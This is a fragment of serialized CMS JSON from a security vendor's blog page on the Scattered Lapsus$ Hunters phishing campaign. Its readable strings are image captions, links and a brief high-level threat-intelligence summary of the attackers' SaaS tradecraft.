31769,31772,31779],{"nodeType":173,"value":37,"marks":31770,"data":31771},[],{},{"nodeType":186,"data":31773,"content":31774},{"uri":5002},[31775],{"nodeType":173,"value":8780,"marks":31776,"data":31778},[31777],{"type":194},{},{"nodeType":173,"value":8785,"marks":31780,"data":31781},[],{},{"nodeType":178,"data":31783,"content":31784},{},[31785],{"nodeType":173,"value":8792,"marks":31786,"data":31787},[],{},{"nodeType":312,"data":31789,"content":31792},{"target":31790},{"sys":31791},{"id":685,"type":317,"linkType":318},[],{"nodeType":312,"data":31794,"content":31797},{"target":31795},{"sys":31796},{"id":8804,"type":317,"linkType":318},[],{"nodeType":178,"data":31799,"content":31800},{},[31801],{"nodeType":173,"value":8810,"marks":31802,"data":31803},[],{},{"nodeType":178,"data":31805,"content":31806},{},[31807],{"nodeType":173,"value":8817,"marks":31808,"data":31809},[],{},{"nodeType":235,"data":31811,"content":31812},{},[31813],{"nodeType":173,"value":8824,"marks":31814,"data":31816},[31815],{"type":370},{},{"nodeType":178,"data":31818,"content":31819},{},[31820],{"nodeType":173,"value":8832,"marks":31821,"data":31822},[],{},{"nodeType":178,"data":31824,"content":31825},{},[31826],{"nodeType":173,"value":8839,"marks":31827,"data":31828},[],{},{"nodeType":312,"data":31830,"content":31833},{"target":31831},{"sys":31832},{"id":8846,"type":317,"linkType":318},[],{"nodeType":178,"data":31835,"content":31836},{},[31837],{"nodeType":173,"value":8852,"marks":31838,"data":31839},[],{},{"nodeType":178,"data":31841,"content":31842},{},[31843,31846,31853],{"nodeType":173,"value":8859,"marks":31844,"data":31845},[],{},{"nodeType":186,"data":31847,"content":31848},{"uri":8864},[31849],{"nodeType":173,"value":8867,"marks":31850,"data":31852},[31851],{"type":194},{},{"nodeType":173,"value":8872,"marks":31854,"data":31855},[],{},{"nodeType":235,"data":31857,"content":31858},{},[31859],{"nodeType":173,"value":8879,"marks":31860,"data":31862},[31861],{"type":370},{},{"nodeType":178,"data":31864,"content":31865},{},[31866],{"nodeType":173,"value":8887,"marks":31867,"data":31868},[],{},{"nodeType":178,"data":31870,"content":31871},{},[31872],{"nodeType":173,"value":8894,"marks":31873,"data":31874},[],{},{"nodeType":178,"data":31876,"content":31877},{},[31878,31881,31888],{"nodeType":173,"value":8901,"marks":31879,"data":31880},[],{},{"nodeType":186,"data":31882,"content":31883},{"uri":8906},[31884],{"nodeType":173,"value":8909,"marks":31885,"data":31887},[31886],{"type":194},{},{"nodeType":173,"value":8914,"marks":31889,"data":31890},[],{},{"nodeType":312,"data":31892,"content":31895},{"target":31893},{"sys":31894},{"id":8921,"type":317,"linkType":318},[],{"nodeType":178,"data":31897,"content":31898},{},[31899,31902,31909],{"nodeType":173,"value":8927,"marks":31900,"data":31901},[],{},{"nodeType":186,"data":31903,"content":31904},{"uri":4342},[31905],{"nodeType":173,"value":4519,"marks":31906,"data":31908},[31907],{"type":194},{},{"nodeType":173,"value":8938,"marks":31910,"data":31911},[],{},{"nodeType":312,"data":31913,"content":31916},{"target":31914},{"sys":31915},{"id":8945,"type":317,"linkType":318},[],{"nodeType":178,"data":31918,"content":31919},{},[31920],{"nodeType":173,"value":8951,"marks":31921,"data":31922},[],{},{"nodeType":312,"data":31924,"content":31927},{"target":31925},{"sys":31926},{"id":8958,"type":317,"linkType":318},[],{"nodeType":231,"data":31929,"content":31930},{},[],{"nodeType":169,"data":31932,"content":31933},{},[31934],{"nodeType":173,"value":8967,"marks":31935,"data":31937},[31936],{"type":370},{},{"nodeType":178,"data":31939,"content":31940},{},[31941],{"nodeType":173,"value":8975,"marks":31942,"data":31943},[],{},{"nodeType":178,"data":31945,"content":31946},{},[31947,31950,31957],{"nodeType":173,"value":8982,"marks":31948,"data":31949},[],{},{"nodeType":186,"data":31951,"content":31952},{"uri":8987},[31953],{"nodeType":173,"value":8157,"marks":31954,"data":31956},[31955],{"type":194},{},{"nodeType":173,"value":8994,"marks":31958,"data":31959},[],{},{"nodeType":178,"data":31961,"content":31962},{},[31963],{"nodeType":173,"value":9001,"marks":31964,"data":31965},[],{},{"nodeType":178,"data":31967,"content":31968},{},[31969,31972,31976,31979,31986],{"nodeType":173,"value":9008,"marks":31970,"data":31971},[],{},{"nodeType":173,"value":9012,"marks":31973,"data":31975},[31974],{"type":370},{},{"nodeType":173,"value":2936,"marks":31977,"data":31978},[],{},{"nodeType":186,"data":31980,"content":31981},{"uri":9021},[31982],{"nodeType":173,"value":9024,"marks":31983,"data":31985},[31984],{"type":194},{},{"nodeType":173,"value":9029,"marks":31987,"data":31988},[],{},{"nodeType":178,"data":31990,"content":31991},{},[31992],{"nodeType":173,"value":9036,"marks":31993,"data":31994},[],{},{"nodeType":178,"data":31996,"content":31997},{},[31998],{"nodeType":173,"value":9043,"marks":31999,"data":32001},[32000],{"type":370},{},{"nodeType":231,"data":32003,"content":32004},{},[],{"nodeType":169,"data":32006,"content":32007},{},[32008],{"nodeType":173,"value":9054,"marks":32009,"data":32011},[32010],{"type":370},{},{"nodeType":178,"data":32013,"content":32014},{},[32015],{"nodeType":173,"value":9062,"marks":32016,"data":32017},[],{},{"nodeType":178,"data":32019,"content":32020},{},[32021],{"nodeType":173,"value":9069,"marks":32022,"data":32023},[],{},{"nodeType":312,"data":32025,"content":32028},{"target":32026},{"sys":32027},{"id":9076,"type":317,"linkType":318},[],{"nodeType":178,"data":32030,"content":32031},{},[32032],{"nodeType":173,"value":9082,"marks":32033,"data":32034},[],{},{"nodeType":250,"data":32036,"content":32037},{},[32038,32056],{"nodeType":254,"data":32039,"content":32040},{},[32041],{"nodeType":178,"data":32042,"content":32043},{},[32044,32047,32053],{"nodeType":173,"value":37,"marks":32045,"data":32046},[],{},{"nodeType":186,"data":32048,"content":32049},{"uri":9099},[32050],{"nodeType":173,"value":9102,"marks":32051,"data":32052},[],{},{"nodeType":173,"value":9106,"marks":32054,"data":32055},[],{},{"nodeType":254,"data":32057,"content":32058},{},[32059],{"nodeType":178,"data":32060,"content":32061},{},[32062,32065,32071],{"nodeType":173,"value":37,"marks":32063,"data":32064},[],{},{"nodeType":186,"data":32066,"content":32067},{"uri":9120},[32068],{"nodeType":173,"value":9123,"marks":32069,"data":32070},[],{},{"nodeType":173,"value":9127,"marks":32072,"data":32073},[],{},{"nodeType":312,"data":32075,"content":32078},{"target":32076},{"sys":32077},{"id":9134,"type":317,"linkType":318},[],{"nodeType":178,"data":32080,"content":32081},{},[32082],{"nodeType":173,"value":9140,"marks":32083,"data":32084},[],{},{"nodeType":178,"data":32086,"content":32087},{},[32088,32091,32098,32101,32108],{"nodeType":173,"value":9147,"marks":32089,"data":32090},[],{},{"nodeType":186,"data":32092,"content":32093},{"uri":9152},[32094],{"nodeType":173,"value":9155,"marks":32095,"data":32097},[32096],{"type":194},{},{"nodeType":173,"value":9160,"marks":32099,"data":32100},[],{},{"nodeType":186,"data":32102,"content":32103},{"uri":1034},[32104],{"nodeType":173,"value":9167,"marks":32105,"data":32107},[32106],{"type":194},{},{"nodeType":173,"value":9172,"marks":32109,"data":32110},[],{},{"nodeType":312,"data":32112,"content":32115},{"target":32113},{"sys":32114},{"id":9179,"type":317,"linkType":318},[],{"nodeType":3769,"data":32117,"content":32118},{},[32119],{"nodeType":178,"data":32120,"content":32121},{},[32122,32125,32132,32135,32141,32144,32151],{"nodeType":173,"value":3925,"marks":32123,"data":32124},[],{},{"nodeType":186,"data":32126,"content":32127},{"uri":1456},[32128],{"nodeType":173,"value":3932,"marks":32129,"data":32131},[32130],{"type":194},{},{"nodeType":173,"value":2936,"marks":32133,"data":32134},[],{},{"nodeType":186,"data":32136,"content":32137},{"uri":3941},[32138],{"nodeType":173,"value":3944,"marks":32139,"data":32140},[],{},{"nodeType":173,"value":3949,"marks":32142,"data":32143},[],{},{"nodeType":186,"data":32145,"content":32146},{"uri":1469},[32147],{"nodeType":173,"value":1472,"marks":32148,"data":32150},[32149],{"type":194},{},{"nodeType":173,"value":1477,"marks":32152,"data":32153},[],{},{"nodeType":178,"data":32155,"content":32156},{},[32157],{"nodeType":173,"value":37,"marks":32158,"data":32159},[],{},{"entries":32161},{"hyperlink":32162,"inline":32163,"block":32164},[],[],[32165,32172,32179,32204,32211,32216,32241,32245,32271,32276],{"sys":32166,"__typename":5345,"title":32167,"caption":32168,"layoutMode":118,"file":32169},{"id":8742},"SLH TOR leak site with claimed victims.","SLH Tor leak site with claimed victims.",{"url":32170,"width":32171,"height":22694},"https://images.ctfassets.net/y1cdw1ablpvd/PoWJBZ3uyl94usKVv3zgr/ed5aefc88cf39fe354755c7b145564bf/image4.png",1284,{"sys":32173,"__typename":5345,"title":32174,"caption":32174,"layoutMode":118,"file":32175},{"id":685},"Big picture view of Scattered Lapsus$ Hunters breaches since 2021.",{"url":32176,"width":32177,"height":32178},"https://images.ctfassets.net/y1cdw1ablpvd/415gvGUy6Ywr2zofY8Phpk/dc9a8461ef07c041fef4a7fb39d0a25b/Screenshot_2026-02-25_at_09.50.56.png",3414,1852,{"sys":32180,"__typename":5311,"content":32181,"name":32203,"title":118},{"id":8804},{"json":32182},{"data":32183,"content":32184,"nodeType":165},{},[32185],{"data":32186,"content":32187,"nodeType":178},{},[32188,32192,32200],{"data":32189,"marks":32190,"value":32191,"nodeType":173},{},[],"Get the background on Scattered Lapsus$ Hunters, and how they relate to Scattered Spider, Lapsus$, ShinyHunters, and other Com-affiliated groups in our recent deep dive, unpacking related breaches dating back to 2021 ",{"data":32193,"content":32194,"nodeType":186},{"uri":5002},[32195],{"data":32196,"marks":32197,"value":32199,"nodeType":173},{},[32198],{"type":194},"in our recent blog post",{"data":32201,"marks":32202,"value":1477,"nodeType":173},{},[],"SLH campaign insight box 1",{"sys":32205,"__typename":5345,"title":32206,"caption":32207,"layoutMode":118,"file":32208},{"id":8846},"What the operator sees in their phishing dashboard.","Phishing dashboard view provided by Okta Threat Intelligence.",{"url":32209,"width":11967,"height":32210},"https://images.ctfassets.net/y1cdw1ablpvd/3IvcYr8sCMsCbhnzG9OzJA/35e3bdcf6dcddb3c431600afe490fe7e/image5.png",558,{"sys":32212,"__typename":5345,"title":32213,"caption":32213,"layoutMode":118,"file":32214},{"id":8921},"SSO panel examples in Entra and Okta.",{"url":32215,"width":5358,"height":28034},"https://images.ctfassets.net/y1cdw1ablpvd/31RIcvGgLz2fmHBYsZyEV5/4326e200aa8ba9879257c2f9b643cf08/image1.png",{"sys":32217,"__typename":5311,"content":32218,"name":32240,"title":118},{"id":8945},{"json":32219},{"data":32220,"content":32221,"nodeType":165},{},[32222],{"data":32223,"content":32224,"nodeType":178},{},[32225,32228,32236],{"data":32226,"marks":32227,"value":37,"nodeType":173},{},[],{"data":32229,"content":32231,"nodeType":186},{"uri":32230},"https://cloud.google.com/blog/topics/threat-intelligence/expansion-shinyhunters-saas-data-theft",[32232],{"data":32233,"marks":32234,"value":32235,"nodeType":173},{},[],"Mandiant has reported",{"data":32237,"marks":32238,"value":32239,"nodeType":173},{},[]," how the attacker opportunistically pivots across accessible SaaS platforms (SharePoint, Salesforce, DocuSign, Slack), hunting for specific strings like “poc,” “confidential,” “salesforce,” and “vpn.” Notable tradecraft includes using ToogleBox Recall to delete MFA enrollment notifications from victims’ inboxes and leveraging PowerShell to bulk-download SharePoint content routed through commercial VPN services like Mullvad, Oxylabs, and NetNut. Check out their blog post for some example SaaS activity logs that can be used to investigate a potential compromise. ","SLH V2 insight box 1",{"sys":32242,"__typename":5434,"title":32243,"arcadeDemoUrl":32244,"playText":5437},{"id":8958},"SSO Exploitation Demo","https://demo.arcade.software/pwGUZuoRdTLzfbWGZUDJ?embed",{"sys":32246,"__typename":5311,"content":32247,"name":32270,"title":118},{"id":9076},{"json":32248},{"data":32249,"content":32250,"nodeType":165},{},[32251],{"data":32252,"content":32253,"nodeType":178},{},[32254,32258,32266],{"data":32255,"marks":32256,"value":32257,"nodeType":173},{},[],"This even includes brand new techniques that have never been seen in the wild — such as ",{"data":32259,"content":32261,"nodeType":186},{"uri":32260},"https://pushsecurity.com/blog/consentfix-debrief/",[32262],{"data":32263,"marks":32264,"value":1857,"nodeType":173},{},[32265],{"type":194},{"data":32267,"marks":32268,"value":32269,"nodeType":173},{},[],", which we blocked the first time it was seen targeting our customers, before even realizing it was a new kind of attack.","SLH campaign insight box 2",{"sys":32272,"__typename":5345,"title":32273,"caption":32273,"layoutMode":118,"file":32274},{"id":9134},"Push blocks phishing pages using real-time, in-browser analysis — shutting the attack down before a compromise happens. ",{"url":32275,"width":5358,"height":23887},"https://images.ctfassets.net/y1cdw1ablpvd/6InFhVkJJOPhsojQoub04K/b43e32cfa0bdc423dc993e930ebe1ae2/image1.png",{"sys":32277,"__typename":5345,"title":32278,"caption":32279,"layoutMode":118,"file":32280},{"id":9179},"Employee Verification Codes","Push provides a lightweight verification feature in every user’s browser — no additional apps or devices required.",{"url":32281,"width":32282,"height":32283},"https://images.ctfassets.net/y1cdw1ablpvd/41X6fkPJgqf14vO3O14TF3/e0cecdbdfaee1353f15ff77ecb6a55a8/Employee_verification_codes.png",2088,1240,{"items":32285},[32286,33000,34133],{"__typename":1528,"sys":32287,"content":32288,"title":20500,"synopsis":20501,"hashTags":118,"publishedDate":20502,"slug":20503,"tagsCollection":32990,"authorsCollection":32996},{"id":19699},{"json":32289},{"nodeType":165,"data":32290,"content":32291},{},[32292,32308,32314,32319,32365,32371,32377,32380,32387,32393,32399,32445,32452,32458,32479,32485,32488,32495,32501,32507,32513,32519,32525,32531,32536,32543,32549,32565,32581,32584,32591,32597,32603,32609,32616,32632,32638,32643,32650,32666,32682,32784,32787,32794,32800,32806,32809,32816,32822,32828,32834,32893,32919,32922,32929,32935,32941,32947,32953,32979,32984],{"nodeType":178,"data":32293,"content":32294},{},[32295,32298,32305],{"nodeType":173,"value":19708,"marks":32296,"data":32297},[],{},{"nodeType":186,"data":32299,"content":32300},{"uri":1854},[32301],{"nodeType":173,"value":1857,"marks":32302,"data":32304},[32303],{"type":194},{},{"nodeType":173,"value":19719,"marks":32306,"data":32307},[],{},{"nodeType":178,"data":32309,"content":32310},{},[32311],{"nodeType":173,"value":19726,"marks":32312,"data":32313},[],{},{"nodeType":312,"data":32315,"content":32318},{"target":32316},{"sys":32317},{"id":19733,"type":317,"linkType":318},[],{"nodeType":178,"data":32320,"content":32321},{},[32322,32325,32332,32335,32342,32345,32352,32355,32362],{"nodeType":173,"value":19739,"marks":32323,"data":32324},[],{},{"nodeType":186,"data":32326,"content":32327},{"uri":19744},[32328],{"nodeType":173,"value":19747,"marks":32329,"data":32331},[32330],{"type":194},{},{"nodeType":173,"value":19752,"marks":32333,"data":32334},[],{},{"nodeType":186,"data":32336,"content":32337},{"uri":19757},[32338],{"nodeType":173,"value":1255,"marks":32339,"data":32341},[32340],{"type":194},{},{"nodeType":173,"value":2936,"marks":32343,"data":32344},[],{},{"nodeType":186,"data":32346,"content":32347},{"uri":19768},[32348],{"nodeType":173,"value":19771,"marks":32349,"data":32351},[32350],{"type":194},{},{"nodeType":173,"value":9534,"marks":32353,"data":32354},[],{},{"nodeType":186,"data":32356,"content":32357},{"uri":12080},[32358],{"nodeType":173,"value":19782,"marks":32359,"data":32361},[32360],{"type":194},{},{"nodeType":173,"value":19787,"marks":32363,"data":32364},[],{},{"nodeType":178,"data":32366,"content":32367},{},[32368],{"nodeType":173,"value":19794,"marks":32369,"data":32370},[],{},{"nodeType":178,"data":32372,"content":32373},{},[32374],{"nodeType":173,"value":19801,"marks":32375,"data":32376},[],{},{"nodeType":231,"data":32378,"content":32379},{},[],{"nodeType":169,"data":32381,"content":32382},{},[32383],{"nodeType":173,"value":19811,"marks":32384,"data":32386},[32385],{"type":370},{},{"nodeType":178,"data":32388,"content":32389},{},[32390],{"nodeType":173,"value":19819,"marks":32391,"data":32392},[],{},{"nodeType":178,"data":32394,"content":32395},{},[32396],{"nodeType":173,"value":19826,"marks":32397,"data":32398},[],{},{"nodeType":178,"data":32400,"content":32401},{},[32402,32405,32412,32415,32422,32425,32432,32435,32442],{"nodeType":173,"value":19833,"marks":32403,"data":32404},[],{},{"nodeType":186,"data":32406,"content":32407},{"uri":19838},[32408],{"nodeType":173,"value":8091,"marks":32409,"data":32411},[32410],{"type":194},{},{"nodeType":173,"value":933,"marks":32413,"data":32414},[],{},{"nodeType":186,"data":32416,"content":32417},{"uri":9275},[32418],{"nodeType":173,"value":1812,"marks":32419,"data":32421},[32420],{"type":194},{},{"nodeType":173,"value":19855,"marks":32423,"data":32424},[],{},{"nodeType":186,"data":32426,"content":32427},{"uri":8112},[32428],{"nodeType":173,"value":8115,"marks":32429,"data":32431},[32430],{"type":194},{},{"nodeType":173,"value":19866,"marks":32433,"data":32434},[],{},{"nodeType":186,"data":32436,"content":32437},{"uri":5002},[32438],{"nodeType":173,"value":19873,"marks":32439,"data":32441},[32440],{"type":194},{},{"nodeType":173,"value":1477,"marks":32443,"data":32444},[],{},{"nodeType":235,"data":32446,"content":32447},{},[32448],{"nodeType":173,"value":19884,"marks":32449,"data":32451},[32450],{"type":370},{},{"nodeType":178,"data":32453,"content":32454},{},[32455],{"nodeType":173,"value":19892,"marks":32456,"data":32457},[],{},{"nodeType":250,"data":32459,"content":32460},{},[32461,32470],{"nodeType":254,"data":32462,"content":32463},{},[32464],{"nodeType":178,"data":32465,"content":32466},{},[32467],{"nodeType":173,"value":19905,"marks":32468,"data":32469},[],{},{"nodeType":254,"data":32471,"content":32472},{},[32473],{"nodeType":178,"data":32474,"content":32475},{},[32476],{"nodeType":173,"value":19915,"marks":32477,"data":32478},[],{},{"nodeType":178,"data":32480,"content":32481},{},[32482],{"nodeType":173,"value":19922,"marks":32483,"data":32484},[],{},{"nodeType":231,"data":32486,"content":32487},{},[],{"nodeType":169,"data":32489,"content":32490},{},[32491],{"nodeType":173,"value":19932,"marks":32492,"data":32494},[32493],{"type":370},{},{"nodeType":178,"data":32496,"content":32497},{},[32498],{"nodeType":173,"value":19940,"marks":32499,"data":32500},[],{},{"nodeType":178,"data":32502,"content":32503},{},[32504],{"nodeType":173,"value":19947,"marks":32505,"data":32506},[],{},{"nodeType":178,"data":32508,"content":32509},{},[32510],{"nodeType":173,"value":19954,"marks":32511,"data":32512},[],{},{"nodeType":178,"data":32514,"content":32515},{},[32516],{"nodeType":173,"value":19961,"marks":32517,"data":32518},[],{},{"nodeType":178,"data":32520,"content":32521},{},[32522],{"nodeType":173,"value":19968,"marks":32523,"data":32524},[],{},{"nodeType":178,"data":32526,"content":32527},{},[32528],{"nodeType":173,"value":19975,"marks":32529,"data":32530},[],{},{"nodeType":312,"data":32532,"content":32535},{"target":32533},{"sys":32534},{"id":7950,"type":317,"linkType":318},[],{"nodeType":235,"data":32537,"content":32538},{},[32539],{"nodeType":173,"value":19987,"marks":32540,"data":32542},[32541],{"type":370},{},{"nodeType":178,"data":32544,"content":32545},{},[32546],{"nodeType":173,"value":19995,"marks":32547,"data":32548},[],{},{"nodeType":178,"data":32550,"content":32551},{},[32552,32555,32562],{"nodeType":173,"value":20002,"marks":32553,"data":32554},[],{},{"nodeType":186,"data":32556,"content":32557},{"uri":1854},[32558],{"nodeType":173,"value":20009,"marks":32559,"data":32561},[32560],{"type":194},{},{"nodeType":173,"value":20014,"marks":32563,"data":32564},[],{},{"nodeType":178,"data":32566,"content":32567},{},[32568,32571,32578],{"nodeType":173,"value":20021,"marks":32569,"data":32570},[],{},{"nodeType":186,"data":32572,"content":32573},{"uri":20026},[32574],{"nodeType":173,"value":20029,"marks":32575,"data":32577},[32576],{"type":194},{},{"nodeType":173,"value":20034,"marks":32579,"data":32580},[],{},{"nodeType":231,"data":32582,"content":32583},{},[],{"nodeType":169,"data":32585,"content":32586},{},[32587],{"nodeType":173,"value":20044,"marks":32588,"data":32590},[32589],{"type":370},{},{"nodeType":178,"data":32592,"content":32593},{},[32594],{"nodeType":173,"value":20052,"marks":32595,"data":32596},[],{},{"nodeType":178,"data":32598,"content":32599},{},[32600],{"nodeType":173,"value":20059,"marks":32601,"data":32602},[],{},{"nodeType":178,"data":32604,"content":32605},{},[32606],{"nodeType":173,"value":20066,"marks":32607,"data":32608},[],{},{"nodeType":235,"data":32610,"content":32611},{},[32612],{"nodeType":173,"value":20073,"marks":32613,"data":32615},[32614],{"type":370},{},{"nodeType":178,"data":32617,"content":32618},{},[32619,32622,32629],{"nodeType":173,"value":20081,"marks":32620,"data":32621},[],{},{"nodeType":186,"data":32623,"content":32624},{"uri":19744},[32625],{"nodeType":173,"value":20088,"marks":32626,"data":32628},[32627],{"type":194},{},{"nodeType":173,"value":20093,"marks":32630,"data":32631},[],{},{"nodeType":178,"data":32633,"content":32634},{},[32635],{"nodeType":173,"value":20100,"marks":32636,"data":32637},[],{},{"nodeType":312,"data":32639,"content":32642},{"target":32640},{"sys":32641},{"id":20107,"type":317,"linkType":318},[],{"nodeType":235,"data":32644,"content":32645},{},[32646],{"nodeType":173,"value":20113,"marks":32647,"data":32649},[32648],{"type":370},{},{"nodeType":178,"data":32651,"content":32652},{},[32653,32656,32663],{"nodeType":173,"value":20121,"marks":32654,"data":32655},[],{},{"nodeType":186,"data":32657,"content":32658},{"uri":20126},[32659],{"nodeType":173,"value":20129,"marks":32660,"data":32662},[32661],{"type":194},{},{"nodeType":173,"value":20134,"marks":32664,"data":32665},[],{},{"nodeType":178,"data":32667,"content":32668},{},[32669,32672,32679],{"nodeType":173,"value":20141,"marks":32670,"data":32671},[],{},{"nodeType":186,"data":32673,"content":32674},{"uri":20146},[32675],{"nodeType":173,"value":20149,"marks":32676,"data":32678},[32677],{"type":194},{},{"nodeType":173,"value":20154,"marks":32680,"data":32681},[],{},{"nodeType":250,"data":32683,"content":32684},{},[32685,32694,32703,32712,32721,32730,32739,32748,32757,32766,32775],{"nodeType":254,"data":32686,"content":32687},{},[32688],{"nodeType":178,"data":32689,"content":32690},{},[32691],{"nodeType":173,"value":20167,"marks":32692,"data":32693},[],{},{"nodeType":254,"data":32695,"content":32696},{},[32697],{"nodeType":178,"data":32698,"content":32699},{},[32700],{"nodeType":173,"value":20177,"marks":32701,"data":32702},[],{},{"nodeType":254,"data":32704,"content":32705},{},[32706],{"nodeType":178,"data":32707,"content":32708},{},[32709],{"nodeType":173,"value":20187,"marks":32710,"data":32711},[],{},{"nodeType":254,"data":32713,"content":32714},{},[32715],{"nodeType":178,"data":32716,"content":32717},{},[32718],{"nodeType":173,"value":20197,"marks":32719,"data":32720},[],{},{"nodeType":254,"data":32722,"content":32723},{},[32724],{"nodeType":178,"data":32725,"content":32726},{},[32727],{"nodeType":173,"value":20207,"marks":32728,"data":32729},[],{},{"nodeType":254,"data":32731,"content":32732},{},[32733],{"nodeType":178,"data":32734,"content":32735},{},[32736],{"nodeType":173,"value":20217,"marks":32737,"data":32738},[],{},{"nodeType":254,"data":32740,"content":32741},{},[32742],{"nodeType":178,"data":32743,"content":32744},{},[32745],{"nodeType":173,"value":20227,"marks":32746,"data":32747},[],{},{"nodeType":254,"data":32749,"content":32750},{},[32751],{"nodeType":178,"data":32752,"content":32753},{},[32754],{"nodeType":173,"value":20237,"marks":32755,"data":32756},[],{},{"nodeType":254,"data":32758,"content":32759},{},[32760],{"nodeType":178,"data":32761,"content":32762},{},[32763],{"nodeType":173,"value":20247,"marks":32764,"data":32765},[],{},{"nodeType":254,"data":32767,"content":32768},{},[32769],{"nodeType":178,"data":32770,"content":32771},{},[32772],{"nodeType":173,"value":20257,"marks":32773,"data":32774},[],{},{"nodeType":254,"data":32776,"content":32777},{},[32778],{"nodeType":178,"data":32779,"content":32780},{},[32781],{"nodeType":173,"value":20267,"marks":32782,"data":32783},[],{},{"nodeType":231,"data":32785,"content":32786},{},[],{"nodeType":169,"data":32788,"content":32789},{},[32790],{"nodeType":173,"value":20277,"marks":32791,"data":32793},[32792],{"type":370},{},{"nodeType":178,"data":32795,"content":32796},{},[32797],{"nodeType":173,"value":20285,"marks":32798,"data":32799},[],{},{"nodeType":178,"data":32801,"content":32802},{},[32803],{"nodeType":173,"value":20292,"marks":32804,"data":32805},[],{},{"nodeType":231,"data":32807,"content":32808},{},[],{"nodeType":169,"data":32810,"content":32811},{},[32812],{"nodeType":173,"value":20302,"marks":32813,"data":32815},[32814],{"type":370},{},{"nodeType":178,"data":32817,"content":32818},{},[32819],{"nodeType":173,"value":20310,"marks":32820,"data":32821},[],{},{"nodeType":178,"data":32823,"content":32824},{},[32825],{"nodeType":173,"value":20317,"marks":32826,"data":32827},[],{},{"nodeType":178,"data":32829,"content":32830},{},[32831],{"nodeType":173,"value":20324,"marks":32832,"data":32833},[],{},{"nodeType":250,"data":32835,"content":32836},{},[32837,32856,32865,32884],{"nodeType":254,"data":32838,"content":32839},{},[32840],{"nodeType":178,"data":32841,"content":32842},{},[32843,32846,32853],{"nodeType":173,"value":20337,"marks":32844,"data":32845},[],{},{"nodeType":186,"data":32847,"content":32848},{"uri":20342},[32849],{"nodeType":173,"value":20345,"marks":32850,"data":32852},[32851],{"type":194},{},{"nodeType":173,"value":20350,"marks":32854,"data":32855},[],{},{"nodeType":254,"data":32857,"content":32858},{},[32859],{"nodeType":178,"data":32860,"content":32861},{},[32862],{"nodeType":173,"value":20360,"marks":32863,"data":32864},[],{},{"nodeType":254,"data":32866,"content":32867},{},[32868],{"nodeType":178,"data":32869,"content":32870},{},[32871,32874,32881],{"nodeType":173,"value":37,"marks":32872,"data":32873},[],{},{"nodeType":186,"data":32875,"content":32876},{"uri":12080},[32877],{"nodeType":173,"value":20376,"marks":32878,"data":32880},[32879],{"type":194},{},{"nodeType":173,"value":20381,"marks":32882,"data":32883},[],{},{"nodeType":254,"data":32885,"content":32886},{},[32887],{"nodeType":178,"data":32888,"content":32889},{},[32890],{"nodeType":173,"value":20391,"marks":32891,"data":32892},[],{},{"nodeType":178,"data":32894,"content":32895},{},[32896,32899,32906,32909,32916],{"nodeType":173,"value":20398,"marks":32897,"data":32898},[],{},{"nodeType":186,"data":32900,"content":32901},{"uri":20403},[32902],{"nodeType":173,"value":20406,"marks":32903,"data":32905},[32904],{"type":194},{},{"nodeType":173,"value":20411,"marks":32907,"data":32908},[],{},{"nodeType":186,"data":32910,"content":32911},{"uri":19768},[32912],{"nodeType":173,"value":19771,"marks":32913,"data":32915},[32914],{"type":194},{},{"nodeType":173,"value":197,"marks":32917,"data":32918},[],{},{"nodeType":231,"data":32920,"content":32921},{},[],{"nodeType":169,"data":32923,"content":32924},{},[32925],{"nodeType":173,"value":20431,"marks":32926,"data":32928},[32927],{"type":370},{},{"nodeType":178,"data":32930,"content":32931},{},[32932],{"nodeType":173,"value":8525,"marks":32933,"data":32934},[],{},{"nodeType":178,"data":32936,"content":32937},{},[32938],{"nodeType":173,"value":20445,"marks":32939,"data":32940},[],{},{"nodeType":178,"data":32942,"content":32943},{},[32944],{"nodeType":173,"value":20452,"marks":32945,"data":32946},[],{},{"nodeType":178,"data":32948,"content":32949},{},[32950],{"nodeType":173,"value":20459,"marks":32951,"data":32952},[],{},{"nodeType":178,"data":32954,"content":32955},{},[32956,32959,32966,32969,32976],{"nodeType":173,"value":1451,"marks":32957,"data":32958},[],{},{"nodeType":186,"data":32960,"content":32961},{"uri":1456},[32962],{"nodeType":173,"value":1459,"marks":32963,"data":32965},[32964],{"type":194},{},{"nodeType":173,"value":1464,"marks":32967,"data":32968},[],{},{"nodeType":186,"data":32970,"content":32971},{"uri":1469},[32972],{"nodeType":173,"value":1472,"marks":32973,"data":32975},[32974],{"type":194},{},{"nodeType":173,"value":1477,"marks":32977,"data":32978},[],{},{"nodeType":312,"data":32980,"content":32983},{"target":32981},{"sys":32982},{"id":20492,"type":317,"linkType":318},[],{"nodeType":178,"data":32985,"content":32986},{},[32987],{"nodeType":173,"value":37,"marks":32988,"data":32989},[],{},{"items":32991},[32992,32994],{"sys":32993,"name":509},{"id":508},{"sys":32995,"name":505},{"id":504},{"items":32997},[32998],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":32999},{"url":1496},{"__typename":1528,"sys":33001,"content":33002,"title":25185,"synopsis":25186,"hashTags":118,"publishedDate":25187,"slug":25188,"tagsCollection":34123,"authorsCollection":34129},{"id":23904},{"json":33003},{"data":33004,"content":33005,"nodeType":165},{},[33006,33012,33018,33075,33081,33139,33144,33150,33156,33159,33165,33171,33177,33263,33278,33284,33321,33327,33333,33339,33369,33374,33401,33406,33412,33418,33448,33465,33468,33474,33480,33504,33510,33516,33522,33528,33534,33539,33552,33591,33596,33613,33616,33622,33628,33645,33651,33677,33694,33700,33717,33723,33729,33780,33786,33791,33804,33817,33834,33839,33856,33862,33865,33871,33877,33883,33889,33906,33912,33929,33934,33940,33970,33987,33990,33996,34002,34008,34025,34031,34044,34049,34055,34061,34078,34081,34087,34093,34099],{"data":33007,"content":33008,"nodeType":178},{},[33009],{"data":33010,"marks":33011,"value":23915,"nodeType":173},{},[],{"data":33013,"content":33014,"nodeType":178},{},[33015],{"data":33016,"marks":33017,"value":23922,"nodeType":173},{},[],{"data":33019,"content":33020,"nodeType":250},{},[33021,33039,33057],{"data":33022,"content":33023,"nodeType":254},{},[33024],{"data":33025,"content":33026,"nodeType":178},{},[33027,33030,33036],{"data":33028,"marks":33029,"value":23935,"nodeType":173},{},[],{"data":33031,"content":33032,"nodeType":186},{"uri":1252},[33033],{"data":33034,"marks":33035,"value":1255,"nodeType":173},{},[],{"data":33037,"marks":33038,"value":1260,"nodeType":173},{},[],{"data":33040,"content":33041,"nodeType":254},{},[33042],{"data":33043,"content":33044,"nodeType":178},{},[33045,33048,33054],{"data":33046,"marks":33047,"value":23954,"nodeType":173},{},[],{"data":33049,"content":33050,"nodeType":186},{"uri":1252},[33051],{"data":33052,"marks":33053,"value":1255,"nodeType":173},{},[],{"data":33055,"marks":33056,"value":1260,"node